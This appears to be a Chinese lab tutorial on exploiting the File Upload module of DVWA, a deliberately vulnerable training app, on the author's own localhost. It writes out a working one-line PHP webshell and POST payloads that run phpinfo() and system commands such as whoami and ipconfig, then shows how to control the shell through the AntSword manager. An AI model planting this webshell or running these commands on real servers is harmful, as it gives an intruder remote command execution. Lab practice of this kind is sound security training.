一、方法一
1.新建一个webshell.php的文件,里面写入一句话木马(建议在虚拟机里面弄,不然杀毒软件老是蹦出来)
<?php @eval($_POST['pass']);?>
2.在dvwa中进入File Upload上传文件
3.成功后进入网站
http://127.0.0.1/hackable/uploads/webshell.php
或
http://127.0.0.1/DVWA/hackable/uploads/webshell.php
4.火狐下载HackBar V2(免费版)插件
5.回到网站按F12,点击最后的HackBar,点击Load URL,点击Post data,输入下面的代码得到PHP版本信息以及其中的环境变量配置信息等等
pass=phpinfo();
6.也可以执行系统命令
pass=system('whoami');
pass=system('ipconfig');
二、方法二 :使用中国蚁剑
蚁剑下载参考这篇文章
中国蚁剑(AntSword)安装、使用教程_中国蚁剑使用教程-CSDN博客
1.右键,选择添加数据
2.在 URL地址 中输入上面的网址,连接密码为 :pass,然后点击左上角的 添加
http://127.0.0.1/hackable/uploads/webshell.php
或
http://127.0.0.1/DVWA/hackable/uploads/webshell.php
3.添加后可 双击 查看目标电脑里的文件(现在还是自己的,拿自己做实验),或者 右键 创建虚拟终端 ,可以试试给自己关机(bushi)